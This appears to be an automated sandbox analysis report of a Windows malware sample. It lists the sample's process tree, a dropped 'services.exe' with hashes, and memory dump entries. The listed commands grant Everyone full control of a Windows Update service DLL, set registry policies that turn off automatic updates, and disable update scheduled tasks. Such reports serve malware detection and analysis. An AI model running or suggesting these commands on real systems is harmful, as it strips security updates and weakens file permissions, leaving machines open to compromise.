C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "jgimrcmwq"4⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Windows\services.exeFilesize
5.3MB
MD552fdd7f3ed1b50bc5794983a37cb4064
SHA14a185751e9e94dccb3330ca79f893de7ca080482
SHA256e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2
SHA5124f8c70f866320cdd3a38beb9fdd2820840171677e0e1ad993c05dbe5c64b5b919d2455c01ce619b96d6cdeabf703299301bd766e3c6860b44a7b19fe67db028f
-
C:\Program Files\Windows\services.exeFilesize
5.3MB
MD552fdd7f3ed1b50bc5794983a37cb4064
SHA14a185751e9e94dccb3330ca79f893de7ca080482
SHA256e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2
SHA5124f8c70f866320cdd3a38beb9fdd2820840171677e0e1ad993c05dbe5c64b5b919d2455c01ce619b96d6cdeabf703299301bd766e3c6860b44a7b19fe67db028f
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logFilesize
539B
MD584f2160705ac9a032c002f966498ef74
SHA1e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
SHA2567840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
SHA512f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
-
memory/160-360-0x0000000000000000-mapping.dmp
-
memory/188-173-0x0000000000000000-mapping.dmp
-
memory/192-171-0x0000000000000000-mapping.dmp
-
memory/196-359-0x0000000000000000-mapping.dmp
-
memory/220-219-0x0000000000000000-mapping.dmp
-
memory/224-218-0x0000000000000000-mapping.dmp
-
memory/232-170-0x0000000000000000-mapping.dmp
-
memory/320-172-0x0000000000000000-mapping.dmp
-
memory/512-184-0x0000000000000000-mapping.dmp
-
memory/644-380-0x0000000000000000-mapping.dmp
-
memory/872-372-0x0000000000000000-mapping.dmp
-
memory/1020-137-0x00000196C4610000-0x00000196C4632000-memory.dmpFilesize
136KB
-
memory/1020-140-0x00000196C4810000-0x00000196C4886000-memory.dmpFilesize
472KB
-
memory/1020-132-0x0000000000000000-mapping.dmp
-
memory/1020-216-0x0000000000000000-mapping.dmp
-
memory/1108-379-0x0000000000000000-mapping.dmp
-
memory/1108-182-0x0000000000000000-mapping.dmp
-
memory/1148-390-0x000002522CB20000-0x000002522CB32000-memory.dmpFilesize
72KB
-
memory/1148-368-0x000002522CAF0000-0x000002522CAF6000-memory.dmpFilesize
24KB
-
memory/1340-183-0x0000000000000000-mapping.dmp
-
memory/1344-374-0x0000000000401BEA-mapping.dmp
-
memory/1344-378-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/1344-373-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/1352-117-0x0000000000400000-0x0000000000C91000-memory.dmpFilesize
8.6MB
-
memory/1368-201-0x0000000000000000-mapping.dmp
-
memory/1568-387-0x0000000000000000-mapping.dmp
-
memory/1632-189-0x0000000000400000-0x0000000000C91000-memory.dmpFilesize
8.6MB
-
memory/1664-361-0x0000000000000000-mapping.dmp
-
memory/1688-214-0x0000000000000000-mapping.dmp
-
memory/1752-382-0x0000000000000000-mapping.dmp
-
memory/1808-364-0x0000000000000000-mapping.dmp
-
memory/1812-178-0x0000000000000000-mapping.dmp
-
memory/1820-169-0x0000000000000000-mapping.dmp
-
memory/1928-122-0x000002128A6F0000-0x000002128A8CD000-memory.dmpFilesize
1.9MB
-
memory/1928-124-0x00000212A51F0000-0x00000212A53CC000-memory.dmpFilesize
1.9MB
-
memory/2136-215-0x0000000000000000-mapping.dmp
-
memory/2176-366-0x0000000000000000-mapping.dmp
-
memory/2200-363-0x0000000000000000-mapping.dmp
-
memory/2204-176-0x0000000000000000-mapping.dmp
-
memory/2224-362-0x0000000000000000-mapping.dmp
-
memory/2272-222-0x0000000000000000-mapping.dmp
-
memory/2288-221-0x0000000000000000-mapping.dmp
-
memory/2324-174-0x0000000000000000-mapping.dmp
-
memory/2328-213-0x0000000000000000-mapping.dmp
-
memory/2352-381-0x0000000000000000-mapping.dmp
-
memory/2388-217-0x0000000000000000-mapping.dmp
-
memory/2568-385-0x0000000000000000-mapping.dmp
-
memory/2660-384-0x0000000000000000-mapping.dmp
-
memory/2728-386-0x0000000000000000-mapping.dmp
-
memory/2736-371-0x0000000000000000-mapping.dmp
-
memory/2840-181-0x0000000000000000-mapping.dmp
-
memory/2848-370-0x0000000000000000-mapping.dmp
-
memory/3212-175-0x0000000000000000-mapping.dmp
-
memory/3376-398-0x0000016A81980000-0x0000016A81986000-memory.dmpFilesize
24KB
-
memory/3376-392-0x0000016A81610000-0x0000016A81617000-memory.dmpFilesize
28KB
-
memory/3464-367-0x0000000000000000-mapping.dmp
-
memory/3500-131-0x0000000000000000-mapping.dmp
-
memory/3512-220-0x0000000000000000-mapping.dmp
-
memory/3616-186-0x0000000000000000-mapping.dmp
-
memory/3632-223-0x0000000000000000-mapping.dmp
-
memory/3812-369-0x0000000000000000-mapping.dmp
-
memory/3816-383-0x0000000000000000-mapping.dmp
-
memory/3824-388-0x0000000000000000-mapping.dmp
-
memory/3860-179-0x0000000000000000-mapping.dmp
-
memory/3868-228-0x0000021E1EB70000-0x0000021E1EB8C000-memory.dmpFilesize
112KB
-
memory/3868-202-0x0000000000000000-mapping.dmp
-
memory/3868-234-0x0000021E1ED50000-0x0000021E1EE09000-memory.dmpFilesize
740KB
-
memory/3868-267-0x0000021E1EB60000-0x0000021E1EB6A000-memory.dmpFilesize
40KB
-
memory/3964-180-0x0000000000000000-mapping.dmp
-
memory/4028-177-0x0000000000000000-mapping.dmp
-
memory/4048-365-0x0000000000000000-mapping.dmp
-
memory/4060-389-0x0000000000000000-mapping.dmp